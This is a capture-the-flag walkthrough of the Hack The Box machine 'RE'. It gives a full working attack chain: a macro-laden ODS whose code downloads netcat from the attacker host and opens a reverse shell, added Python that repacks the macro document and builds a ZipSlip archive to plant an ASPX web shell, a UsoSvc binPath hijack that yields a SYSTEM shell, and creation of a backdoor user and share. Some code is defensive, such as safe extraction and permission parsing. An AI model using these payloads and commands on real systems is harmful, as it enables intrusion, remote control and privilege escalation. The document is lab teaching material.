htb-re-nl

As always, start with an nmap scan (a full-port TCP connect scan, output saved to nmapscan):

root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining)
Nmap scan report for 10.10.10.144
Host is up (0.029s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
445/tcp open  microsoft-ds

I found the shares with smbmap, using a null/guest session:

root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p ''
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.144...
[+] IP: 10.10.10.144:445 Name: reblog.htb 
	Disk                  Permissions
	----                  -----------
	IPC$                  READ ONLY
	malware_dropbox       READ ONLY

Next I read through reblog.htb (the blog on port 80) and then uploaded a malicious odt file to the dropbox; it later turned out that it had to be an ods file.

Metasploit has an exploit module that should work for this:

exploit/multi/misc/openoffice_document_macro

We rename the generated document to .zip, open it and edit it by replacing the payload (the Basic module) with:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">
Sub OnLoad
    Shell(&quot;certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe&quot;)
    Shell(&quot;C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe&quot;)
End Sub
</script:module>
Then I save the edited archive with the .ods extension again instead of .zip.

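The repacking step, as an added example in Python (not code from the original post or from the Metasploit module). An ODF document is a zip archive whose first entry must be an uncompressed file named mimetype; a plain unzip/edit/zip round trip does not guarantee that ordering, which is one reason a re-zipped document can be refused. This helper takes an existing .ods, swaps in the Basic module from the post, and writes a fresh archive with mimetype first and stored. The module path Basic/Standard/Module1.xml is an assumption (it is where LibreOffice keeps a module named Module1 in the Standard library, matching script:name="Module1" above); the library and manifest entries that register the module are assumed to already be present in the Metasploit-generated document, so only the module body is replaced. The sample document in the block is constructed inline so the code runs offline.

```python
import io
import zipfile

# Assumed location of the "Module1" Basic module inside the ODS package.
MODULE_PATH = "Basic/Standard/Module1.xml"

# The macro module from the post, with &quot; exactly as it appears in the XML file.
MODULE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">
Sub OnLoad
    Shell(&quot;certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe&quot;)
    Shell(&quot;C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe 10.10.14.7 1111 -e cmd.exe&quot;)
End Sub
</script:module>
"""


def repack_ods(src: bytes, module_xml: str, module_path: str = MODULE_PATH) -> bytes:
    """Return a new ODS: same entries as src, module_path replaced by module_xml,
    and the mimetype entry written first and uncompressed as ODF requires."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(src)) as zin, zipfile.ZipFile(out, "w") as zout:
        names = zin.namelist()
        if "mimetype" not in names:
            raise ValueError("not an ODF package: no mimetype entry")
        zout.writestr("mimetype", zin.read("mimetype"), compress_type=zipfile.ZIP_STORED)
        for name in names:
            if name == "mimetype":
                continue
            data = module_xml.encode("utf-8") if name == module_path else zin.read(name)
            zout.writestr(name, data, compress_type=zipfile.ZIP_DEFLATED)
    return out.getvalue()


def check_odf_layout(data: bytes) -> dict:
    """Inspect an archive: is mimetype the first entry and stored, and which module body is present."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        first = z.infolist()[0]
        names = z.namelist()
        return {
            "mimetype_first": first.filename == "mimetype",
            "mimetype_stored": first.compress_type == zipfile.ZIP_STORED,
            "mimetype": z.read("mimetype").decode() if "mimetype" in names else None,
            "module": z.read(MODULE_PATH).decode() if MODULE_PATH in names else None,
        }


def make_sample_ods() -> bytes:
    """Constructed stand-in for a document that was unzipped and re-zipped with `zip`:
    mimetype is no longer first and is compressed, and Module1 holds a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("content.xml", "<office:document-content/>")
        z.writestr(MODULE_PATH, "<script:module>placeholder</script:module>")
        z.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet")
    return buf.getvalue()


if __name__ == "__main__":
    before = check_odf_layout(make_sample_ods())
    after = check_odf_layout(repack_ods(make_sample_ods(), MODULE_XML))
    print("before repack: mimetype first =", before["mimetype_first"], "stored =", before["mimetype_stored"])
    print("after repack:  mimetype first =", after["mimetype_first"], "stored =", after["mimetype_stored"])
```

To use it on a real document, read the Metasploit-generated file into `src`, call `repack_ods(src, MODULE_XML)` and write the returned bytes out with a .ods extension; `check_odf_layout` is handy for confirming the layout of any document before uploading it.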
root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 22 02:19:02 2020
.. D 0 Wed Jan 22 02:19:02 2020

8247551 blocks of size 4096. 4294559 blocks available
smb: \> put puckiestyle.odt
putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s)
smb: \>
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -


root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 22 04:59:00 2020
  ..                                  D        0  Wed Jan 22 04:59:00 2020

		8247551 blocks of size 4096. 4294527 blocks available
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s)
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s)
smb: \> 

The odt/ods file I used is here: https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip

root@kali:~# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
re\luke

C:\Program Files\LibreOffice\program>
c:\Users\luke\Desktop>type user.txt
type user.txt
FE41736F5B9311E48E48B520D9F384D3


Creating the ZipSlip archive

I built the zip slip by first creating the folder structure /inetpub/wwwroot/blog on my Kali box, so that the traversal path used below resolves to an existing file.

Then I copied my web shell, puckieshell.aspx, into that folder.

Then I created the zip slip archive with:

root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx
 adding ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx (      deflated 75%)

Next, upload this zip slip archive to the ods folder, where it gets processed by the vulnerable WinRAR (in the certutil command below it is fetched as puckiestyle.zip and saved as runme.rar). The entry name inside the archive starts with enough ../ to climb to the drive root, so extraction drops puckieshell.aspx into C:\inetpub\wwwroot\blog.
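As an added example (not code from the original post), the same archive built in Python, together with the two checks a defender or a careful extractor would run: where a naive join(dest, name) would write each entry, and a refusal of entries that escape the destination. The entry name is the one from the zip command above; the web shell body is a constructed placeholder, and the extraction directory /Users/luke/Documents/ods is the POSIX rendering of the target's C:\Users\luke\Documents\ods, assumed here so the example runs offline.

```python
import io
import os
import posixpath
import zipfile

# Entry name from the post: eight "../" followed by the IIS web root path.
TRAVERSAL_NAME = "../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx"

# Constructed placeholder for the web shell body (the real file is not on the page).
SHELL_BODY = b'<%@ Page Language="C#" %><!-- placeholder webshell body -->'


def build_zip_slip(entry_name: str = TRAVERSAL_NAME, body: bytes = SHELL_BODY) -> bytes:
    """Build an archive whose entry name carries the traversal, as `zip` did in the post.
    zipfile stores the name verbatim; refusing it is the extractor's job."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(entry_name, body)
    return buf.getvalue()


def naive_targets(data: bytes, dest: str) -> list:
    """Where an extractor that just joins dest and the entry name would write each entry.
    POSIX path rules are used; on the box the drive root absorbs the surplus '..' the same way."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return [posixpath.normpath(posixpath.join(dest, n)) for n in z.namelist()]


def slip_entries(data: bytes) -> list:
    """Return the entry names that would escape the extraction directory."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            n = name.replace("\\", "/")
            norm = posixpath.normpath(n)
            absolute = n.startswith("/") or ":" in n.split("/")[0]  # /etc/x or C:/x
            if absolute or norm == ".." or norm.startswith("../"):
                bad.append(name)
    return bad


def safe_extract(data: bytes, dest: str) -> list:
    """Extract only entries that resolve inside dest; raise on the first one that does not.
    Returns the list of files written."""
    bad = slip_entries(data)
    if bad:
        raise ValueError(f"zip slip entry refused: {bad[0]}")
    written = []
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            # Second line of defence: the resolved path must still sit under dest.
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"entry escapes destination: {info.filename}")
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(z.read(info))
            written.append(target)
    return written


if __name__ == "__main__":
    archive = build_zip_slip()
    print("naive extractor would write:", naive_targets(archive, "/Users/luke/Documents/ods"))
    print("entries flagged as zip slip:", slip_entries(archive))
```

Writing the archive to disk is just `open("puckiestyle.zip", "wb").write(build_zip_slip())`; note that the bare `zip` command needed the file to exist at the traversal path on disk, whereas `writestr` takes any name, so the /inetpub/wwwroot/blog scaffolding on Kali is not needed this way.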

c:\Users\luke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4638-2C29

Directory of c:\Users\luke\Documents

06/18/2019 01:05 PM <DIR> .
06/18/2019 01:05 PM <DIR> ..
01/22/2020 03:28 AM <DIR> malware_dropbox
01/22/2020 03:28 AM <DIR> malware_process
01/22/2020 03:46 AM <DIR> ods
06/18/2019 09:30 PM 1,096 ods.yara
06/18/2019 09:33 PM 1,783 process_samples.ps1
03/13/2019 05:47 PM 1,485,312 yara64.exe
3 File(s) 1,488,191 bytes
5 Dir(s) 17,559,576,576 bytes free

c:\Users\luke\Documents>whoami
whoami
re\luke

c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
****  Online  ****
  0000  ...
  322f
CertUtil: -URLCache command completed successfully.

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -

Then I opened the browser and went to the web shell, now served from the blog's web root.

I first created a folder c:\temp to put my files in, and then started a netcat listener:

root@kali:~/htb/re# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
whoami
iis apppool\reblog
c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt
accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

In accesscheck.txt I then discovered that NT AUTHORITY\SERVICE also has RW access (SERVICE_ALL_ACCESS) on UsoSvc. The IIS application pool worker process carries the NT AUTHORITY\SERVICE group in its token, so the web shell can reconfigure that service.

c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt
-snip-
UserManager
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
UsoSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\SERVICE
        SERVICE_ALL_ACCESS
VaultSvc
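Reading a long accesschk dump by eye is error-prone, so here is an added example (not from the original post) that parses accesschk -uvwc output and reports every service on which a principal outside SYSTEM, Administrators and TrustedInstaller holds a right that allows changing the binary path or the DACL. The sample text is constructed from the three services shown above with the indentation restored; the rights list and the trusted-principal set are my assumptions, and the parser keys on the R/W markers and the rights tokens rather than on indentation, since pasted output often loses it.

```python
import re
from collections import OrderedDict

# Constructed sample in the layout accesschk -uvwc prints, built from the services shown in the post.
SAMPLE = """\
UserManager
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
UsoSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\\SERVICE
        SERVICE_ALL_ACCESS
VaultSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\\Administrators
        SERVICE_ALL_ACCESS
"""

# Principals expected to control services (assumption: extend for your own environment).
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "NT SERVICE\\TrustedInstaller"}
# Rights that let the holder rewrite binPath or take over the service's DACL.
RECONFIGURE = {"SERVICE_ALL_ACCESS", "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
               "GENERIC_ALL", "GENERIC_WRITE"}

ACE_RE = re.compile(r"^\s*(RW|R|W)\s+(.+?)\s*$")
RIGHT_RE = re.compile(
    r"^\s*((?:SERVICE|GENERIC|STANDARD)_[A-Z_]+|DELETE|READ_CONTROL|WRITE_DAC|WRITE_OWNER|SYNCHRONIZE)\s*$")


def parse_accesschk(text: str) -> "OrderedDict[str, dict]":
    """Return {service: {principal: set(rights)}} from accesschk -uvwc output."""
    services = OrderedDict()
    service = principal = None
    for line in text.splitlines():
        if not line.strip():
            continue
        right = RIGHT_RE.match(line)
        ace = ACE_RE.match(line)
        if right and service and principal:
            services[service][principal].add(right.group(1))
        elif ace and service:
            principal = ace.group(2)
            services[service].setdefault(principal, set())
        elif "Mandatory Level" in line:
            continue  # integrity label line, not an ACE
        elif not line[0].isspace():
            service = line.strip()  # service names start in column 0
            principal = None
            services[service] = {}
    return services


def writable_services(services, trusted=TRUSTED):
    """Services where a principal outside `trusted` holds a reconfigure right."""
    findings = []
    for svc, aces in services.items():
        for principal, rights in aces.items():
            hit = rights & RECONFIGURE
            if principal not in trusted and hit:
                findings.append((svc, principal, sorted(hit)))
    return findings


if __name__ == "__main__":
    for svc, who, rights in writable_services(parse_accesschk(SAMPLE)):
        print(f"{svc}: {who} has {', '.join(rights)}")
```

Run it against the real file with `writable_services(parse_accesschk(open(r"c:\temp\accesscheck.txt", errors="ignore").read()))`; on this box the only hit is UsoSvc for NT AUTHORITY\SERVICE, which is exactly the service abused below.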

For the privilege escalation I used UsoSvc (first check the current binPath with sc qc usosvc so it can be restored afterwards, then change it, and finally stop and start the service). The "service is not started" and "not responding to the control function" messages below are expected: nc.exe is not a real service executable and never reports back to the service control manager, but by then it has already been launched as SYSTEM and the reverse shell has connected.

C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS

C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd


C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.

More help is available by typing NET HELPMSG 3521.


C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.


C:\inetpub\wwwroot\blog>


root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.

C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.

C:\Windows\system32>z:
z:

Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29

Directory of Z:\

04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free

Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D

Z:\>

Instead of sc and netcat this can also be done with PowerUp's Invoke-ServiceAbuse:
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"

Author: Puckiestyle
